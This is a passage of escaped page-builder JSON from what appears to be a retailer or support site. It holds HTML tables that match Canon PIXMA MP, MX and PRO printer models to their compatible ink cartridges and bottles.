Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td 